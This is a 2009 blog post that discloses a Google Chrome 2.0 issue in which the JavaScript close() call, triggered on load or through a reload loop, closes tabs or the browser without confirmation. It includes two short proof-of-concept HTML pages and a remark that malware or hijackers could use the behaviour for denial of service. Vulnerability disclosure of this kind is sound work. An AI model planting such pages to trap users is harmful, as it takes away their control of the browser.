Google Chrome close() issue

Tuesday, July 07, 2009
##############################
Google Chrome close() issue
VENDOR: http://www.google.com/chrome/
article =http://lostmon.blogspot.com/
2009/07/google-chrome-close-issue.html
##############################

Chrome Version       : 2.0.172.33 (Build oficial )
URLs (if applicable) :
Other browsers tested:
   Safari 4: OK
 Firefox 3.x:OK
       IE 7: OK
       IE 8: OK

What steps will reproduce the problem?

1 - open a web page
2 - navigate to ther page.

Google chrome automatic closes the tab and if we have
only one tab , it closes the process chrome.

What is the expected result?

google chrome don´t close or prompt for close.

What happens instead?

Google chrome closes the tab or if we have only
one tab it closse too without any confirmation.

###########
Abstract
###########

for test all of this need a instaled web server,
and some patience XDD

#############
tesst 1
#############

Create a new html document and write in:

<html><body onload='close()'></body></html>
save it as test1.html in c:\test\  for testing.

1.1 - Open google Chrome and open it with file handler like
    file:///c:/test/test1.html
    Chrome does not close the window and nothing apears...

1.2 - Open The file in a trust intranet zone via
    htttp://localhost/test/test1.html  or via ip
    http://192.168.1.100/test/test1.html
    Chrome does not close the window and nothing apears...


1.3 - Open hard disk and select c:\test\test1.html rigth
    click and open with Google Chrome.
    Chrome open and close auth.

if we change to other even  like onblur ,with onfocus event
it´s interesting because if we try to use inspector to view
the source code, we click in body tag , and we close inspector
the tab is close too,this only aparently afects,wen we open the
html document with test mode 1.3

so this issue aparently can´t exploit in a remote scenario.

###############
test 2
###############

create a new html file and wirte inside , and save it as
test2.html in the test folder.

<html>

<head></head>
<title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title>
<body>
<script>
try { CloseCrome(); } catch(e) {
setTimeout("location.reload();",20);
close(); }
</script>
<h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2>

<p>Google Chrome :2.0.172.33 (Build oficial )<br>
WebKit 530.5<br>V8 1.1.10.13<br>
User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p>
</body>

</html>

2.1 - Open it via file protocol handler file:///c:/test/test2.html ,
    Chrome does not close the window and nothing aparently apears.
    but if we try to navigate to other site like www.google.com
    the tab closes auth.

2.2 - Open it in trust web server http://localhost/test/test2.html ,
    or http://192.168.1.100/test/test2.html Chrome does not close
    the window and nothing aparently apears ;but if we try to navigate
    to other site like www.google.com the tab closes auth.

2.3 - Open hard disk and select c:\test\test2.html rigth
    click and open with Google Chrome.
    Chrome open and close auth.

##############
conclusion
##############

This issue can be a vulnerability , and this can be used for
example to built malwares that can be tramp the browser in a
determinate location and if the user try to look the code
(onfocus)or try to navigate to other site (test2.html)or other
event,the window can close without interaction,them if a
malware or a malicious web page or a browser hijacker  can
load as a default web page and them this can be a 
Denial Of Service Condition


atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Post by Lostmon in 10:04:00 AM
Categories: , , , , ,
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...